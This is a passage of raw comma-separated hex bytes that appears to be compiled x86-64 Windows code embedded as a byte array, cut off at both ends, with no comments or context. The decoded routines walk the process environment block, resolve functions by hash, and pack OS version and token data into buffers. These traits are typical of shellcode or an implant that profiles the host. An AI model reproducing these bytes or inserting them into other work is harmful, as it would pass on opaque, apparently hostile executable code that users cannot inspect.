D0,0x48,0x8B,0x00,0x48,0x89,0xC2,0x48,0x8D,0x05,0x6F,0x5F,0x00,0x00,0x48,0x89,0xC1,0xE8,0x77,0x8C,0xFF,0xFF,0x48,0x8D,0x05,0xFB,0x5E,0x00,0x00,0x48,0x89,0xC1,0xE8,0x68,0x8C,0xFF,0xFF,0xEB,0x58,0x83,0x7D,0xFC,0x00,0x75,0x38,0x8B,0x45,0xF4,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x18,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x89,0xC2,0x48,0x8D,0x05,0x60,0x5F,0x00,0x00,0x48,0x89,0xC1,0xE8,0x39,0x8C,0xFF,0xFF,0x48,0x8D,0x05,0xBD,0x5E,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2A,0x8C,0xFF,0xFF,0xEB,0x1A,0x83,0x45,0xF4,0x01,0x8B,0x45,0xF4,0x3B,0x45,0x20,0x0F,0x82,0x3E,0xFF,0xFF,0xFF,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x01,0x90,0x83,0x7D,0xF8,0x00,0x74,0x15,0x48,0x8B,0x45,0x10,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x09,0xEC,0xFF,0xFF,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x53,0x48,0x81,0xEC,0xB8,0x00,0x00,0x00,0x48,0x8D,0xAC,0x24,0xB0,0x00,0x00,0x00,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x44,0x89,0x45,0x30,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x08,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0x8B,0x45,0xC0,0x89,0x45,0xE0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xA0,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0x80,0x66,0x0F,0x7E,0x45,0x90,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x01,0x00,0x00,0xC0,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x8B,0x5E,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1C,0xAE,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x1E,0xC1,0xA5,0x11,0x48,0x89,0xC1,0xE8,0x2A,0xAC,0xFF,0xFF,0x48,0x89,0x45,0xC8,0x48,0x83,0x7D,0xC8,0x00,0x0F,0x84,0x15,0x03,0x00,0x00,0x48,0x8B,0x45,0x20,0x48,0x85,0xC0,0x75,0x29,0xC7,0x45,0xE4,0x01,0x00,0x00,0x00,0x4C,0x8D,0x45,0x20,0xBA,0x28,0x00,0x00,0x00,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0x6D,0xEB,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x88,0xE6,0x02,0x00,0x00,0x8B,0x45,0xC0,0x89,0x45,0xE0,0x8B,0x45,0xC0,0x89,0xC3,0x48,0x8B,0x05,0x41,0xD6,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x3D,0xD6,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xB2,0x02,0x00,0x00,0x44,0x8B,0x45,0xC0,0x48,0x8B,0x45,0x20,0x48,0x8B,0x4D,0xF0,0x48,0x8D,0x55,0xC0,0x48,0x89,0x54,0x24,0x20,0x45,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x03,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x7D,0xF0,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x79,0x56,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x8B,0x55,0xE0,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD5,0x33,0x00,0x00,0x48,0x8B,0x05,0xC6,0xD5,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC6,0xD5,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x81,0x7D,0xDC,0x23,0x00,0x00,0xC0,0x0F,0x84,0x44,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0xDC,0x00,0x0F,0x88,0x23,0x02,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xE9,0xFD,0x01,0x00,0x00,0x48,0x8B,0x4D,0xF0,0x8B,0x55,0xFC,0x48,0x89,0xD0,0x48,0x01,0xC0,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x02,0x48,0x01,0xC8,0x48,0x8B,0x50,0x04,0x48,0x89,0x55,0xB0,0x8B,0x40,0x0C,0x89,0x45,0xB8,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xBC,0x48,0x8D,0x45,0xB0,0x4C,0x8B,0x55,0xC8,0x49,0x89,0xD1,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC2,0xB9,0x00,0x00,0x00,0x00,0x41,0xFF,0xD2,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x85,0xC1,0x01,0x00,0x00,0x48,0x8B,0x05,0x06,0xD5,0x00,0x00,0xFF,0xD0,0x83,0xF8,0x7A,0x0F,0x85,0xAF,0x01,0x00,0x00,0x8B,0x45,0xBC,0x83,0xC0,0x01,0x89,0x45,0xBC,0x8B,0x45,0xBC,0x89,0xC0,0x48,0x8D,0x1C,0x00,0x48,0x8B,0x05,0xFA,0xD4,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xF6,0xD4,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x74,0x01,0x00,0x00,0x48,0x8D,0x4D,0xBC,0x48,0x8B,0x55,0xE8,0x48,0x8D,0x45,0xB0,0x4C,0x8B,0x55,0xC8,0x49,0x89,0xC9,0x49,0x89,0xD0,0x48,0x89,0xC2,0xB9,0x00,0x00,0x00,0x00,0x41,0xFF,0xD2,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x49,0x01,0x00,0x00,0x48,0x8B,0x55,0x28,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0x48,0x8B,0x05,0x45,0xD5,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0xB2,0x00,0x00,0x00,0xC7,0x45,0xD4,0x01,0x00,0x00,0x00,0xC7,0x45,0x80,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0xB0,0x48,0x89,0x45,0x88,0x8B,0x45,0xB8,0x89,0x45,0x90,0x48,0x8B,0x45,0x20,0x48,0x8D,0x4D,0xC4,0x48,0x8D,0x55,0x80,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x1F,0xF6,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x79,0x0C,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xE9,0xE9,0x00,0x00,0x00,0x8B,0x45,0xC4,0x85,0xC0,0x75,0x60,0x83,0x7D,0x30,0x00,0x74,0x5A,0xC7,0x45,0xA0,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0xB0,0x48,0x89,0x45,0xA4,0xC7,0x45,0xAC,0x02,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0x48,0x8D,0x55,0xA0,0x48,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x10,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x08,0xEA,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x88,0x88,0x00,0x00,0x00,0xC7,0x45,0xC4,0x01,0x00,0x00,0x00,0x90,0xEB,0x7F,0x48,0x83,0x7D,0xE8,0x00,0x74,0x4D,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0x1E,0x32,0x00,0x00,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB6,0x31,0x00,0x00,0x48,0x8B,0x05,0xA7,0xD3,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xA7,0xD3,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x83,0x45,0xFC,0x01,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x39,0x45,0xFC,0x0F,0x82,0xF4,0xFD,0xFF,0xFF,0xEB,0x16,0x90,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x49,0x48,0x83,0x7D,0xF0,0x00,0x74,0x42,0x8B,0x45,0xC0,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3B,0x31,0x00,0x00,0x48,0x8B,0x05,0x2C,0xD3,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x2C,0xD3,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0xE8,0x00,0x74,0x54,0x48,0x83,0x7D,0xE8,0x00,0x74,0x4D,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0x48,0x31,0x00,0x00,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE0,0x30,0x00,0x00,0x48,0x8B,0x05,0xD1,0xD2,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD1,0xD2,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x83,0x7D,0xE4,0x00,0x74,0x15,0x48,0x8B,0x45,0x20,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0x20,0x48,0x89,0xC1,0xE8,0x4A,0xE7,0xFF,0xFF,0x8B,0x45,0xC4,0x48,0x81,0xC4,0xB8,0x00,0x00,0x00,0x5B,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x08,0x48,0x89,0xC2,0x8B,0x45,0x18,0x48,0x01,0xD0,0x48,0x89,0x45,0xF8,0x8B,0x4D,0x28,0x48,0x8B,0x55,0x20,0x48,0x8B,0x45,0xF8,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x3E,0x30,0x00,0x00,0x90,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x48,0x8B,0x45,0x10,0x8B,0x50,0x10,0x8B,0x45,0x20,0x01,0xD0,0x89,0x45,0xFC,0x48,0x8B,0x45,0x10,0x8B,0x40,0x10,0x39,0x45,0xFC,0x73,0x25,0x48,0x8D,0x05,0x01,0x5A,0x00,0x00,0x48,0x89,0xC1,0xE8,0x99,0x86,0xFF,0xFF,0x48,0x8D,0x05,0x22,0x5A,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8A,0x86,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x65,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x18,0x48,0x39,0xC2,0x72,0x25,0x48,0x8D,0x05,0x04,0x5A,0x00,0x00,0x48,0x89,0xC1,0xE8,0x64,0x86,0xFF,0xFF,0x48,0x8D,0x05,0xED,0x59,0x00,0x00,0x48,0x89,0xC1,0xE8,0x55,0x86,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x30,0x48,0x8B,0x45,0x10,0x8B,0x50,0x10,0x44,0x8B,0x45,0x20,0x48,0x8B,0x4D,0x18,0x48,0x8B,0x45,0x10,0x45,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x0D,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x8B,0x55,0xFC,0x89,0x50,0x10,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0x48,0x8B,0x45,0x10,0x8B,0x40,0x20,0x89,0x45,0xD0,0x48,0x8B,0x45,0x10,0x0F,0xB7,0x40,0x24,0x66,0x89,0x45,0xD4,0x48,0x8B,0x45,0x10,0x0F,0xB7,0x40,0x26,0x66,0x89,0x45,0xD6,0xC7,0x45,0xD8,0x03,0x00,0x00,0x00,0xC7,0x45,0xDC,0x20,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xD0,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x0F,0xB7,0x45,0xD4,0x66,0x89,0x02,0x83,0x45,0xFC,0x02,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x0F,0xB7,0x45,0xD6,0x66,0x89,0x02,0x83,0x45,0xFC,0x02,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xD8,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xDC,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xE0,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xE4,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xE8,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xEC,0x89,0x02,0x48,0x8D,0x55,0xB0,0x48,0x8B,0x45,0x10,0x41,0xB8,0x20,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF5,0xFD,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x38,0x48,0x8D,0x6C,0x24,0x30,0x48,0x89,0x4D,0x20,0x48,0x89,0xD3,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xF0,0x48,0x01,0xC2,0x8B,0x03,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xF0,0x48,0x01,0xC2,0x8B,0x43,0x04,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xF0,0x48,0x01,0xC2,0x8B,0x43,0x08,0x89,0x02,0x48,0x8D,0x55,0xF0,0x48,0x8B,0x45,0x20,0x41,0xB8,0x0C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x6D,0xFD,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x38,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x07,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF4,0x48,0x89,0x45,0xC0,0x8B,0x45,0xFC,0x89,0x45,0xC8,0x48,0x8D,0x55,0xC0,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x29,0xFF,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x9F,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x04,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xE8,0x48,0x89,0x45,0xC0,0x8B,0x45,0xF0,0x89,0x45,0xC8,0x48,0x8D,0x55,0xC0,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xD9,0xFE,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x52,0x48,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x09,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xDC,0x48,0x89,0x45,0xC0,0x8B,0x45,0xE4,0x89,0x45,0xC8,0x48,0x8D,0x55,0xC0,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x8C,0xFE,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xE0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0x90,0x0F,0x11,0x45,0xA0,0x0F,0x11,0x45,0xB0,0xC7,0x45,0xC8,0x60,0x00,0x00,0x00,0x8B,0x45,0xC8,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xC0,0x48,0x8B,0x45,0xC0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x05,0x18,0x01,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF8,0x48,0x05,0x1C,0x01,0x00,0x00,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xF8,0x48,0x05,0x20,0x01,0x00,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xF8,0x48,0x05,0x24,0x01,0x00,0x00,0x48,0x89,0x45,0xD8,0x48,0x8B,0x45,0xF8,0x48,0x05,0xE8,0x02,0x00,0x00,0x48,0x89,0x45,0xD0,0x66,0xC7,0x45,0x90,0x09,0x00,0x66,0xC7,0x45,0x92,0x00,0x00,0x66,0xC7,0x45,0x94,0x00,0x00,0xC6,0x45,0x96,0x00,0xC6,0x45,0x97,0x01,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x89,0x45,0x98,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x89,0x45,0x9C,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x89,0x45,0xA0,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x89,0x45,0xA4,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x66,0xC7,0x45,0xAC,0x00,0x00,0x66,0xC7,0x45,0xAE,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x45,0x8C,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0x50,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x58,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x60,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x68,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x70,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x78,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0x90,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0x92,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0x94,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB6,0x45,0x96,0x88,0x02,0x83,0x45,0xCC,0x01,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB6,0x45,0x97,0x88,0x02,0x83,0x45,0xCC,0x01,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0x98,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0x9C,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0xA0,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0xA4,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0xA8,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0xAC,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0xAE,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x48,0x8B,0x45,0xB0,0x48,0x89,0x02,0x83,0x45,0xCC,0x08,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x48,0x8B,0x45,0xB8,0x48,0x89,0x02,0x48,0x8B,0x45,0x10,0x8B,0x40,0x10,0x89,0x85,0x4C,0xFF,0xFF,0xFF,0x8B,0x4D,0x8C,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xBB,0xF9,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xD6,0x00,0x00,0x00,0x48,0x8D,0x55,0x8C,0x48,0x8B,0x45,0x10,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x24,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x46,0xF9,0xFF,0xFF,0x48,0x8D,0x95,0x4C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x25,0xF9,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x8B,0x40,0x10,0x89,0x85,0x48,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x89,0x85,0x44,0xFF,0xFF,0xFF,0x48,0x8D,0x95,0x44,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x41,0xB8,0x04,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x38,0xF9,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x56,0x48,0x8B,0x45,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC8,0x48,0x8B,0x45,0xD0,0x48,0x8B,0x50,0x08,0x48,0x8B,0x45,0x10,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x0C,0xF9,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x2A,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x8D,0x50,0x18,0x48,0x8D,0x8D,0x48,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x93,0xF8,0xFF,0xFF,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xE0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0xD8,0x01,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x70,0x01,0x00,0x00,0x48,0x8D,0x05,0x52,0x53,0x00,0x00,0x48,0x89,0x85,0xA0,0x00,0x00,0x00,0x48,0x8D,0x05,0x5A,0x53,0x00,0x00,0x48,0x89,0x85,0xA8,0x00,0x00,0x00,0x48,0x8D,0x05,0x62,0x53,0x00,0x00,0x48,0x89,0x85,0xB0,0x00,0x00,0x00,0x48,0x8D,0x05,0x68,0x53,0x00,0x00,0x48,0x89,0x85,0xB8,0x00,0x00,0x00,0x48,0x8D,0x05,0x72,0x53,0x00,0x00,0x48,0x89,0x85,0xC0,0x00,0x00,0x00,0x48,0x8D,0x05,0x7E,0x53,0x00,0x00,0x48,0x89,0x85,0xC8,0x00,0x00,0x00,0x48,0x8D,0x05,0x88,0x53,0x00,0x00,0x48,0x89,0x85,0xD0,0x00,0x0